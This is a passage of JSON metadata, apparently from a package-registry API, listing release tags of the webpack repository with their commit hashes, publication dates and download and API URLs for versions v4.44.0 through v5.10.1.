itHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.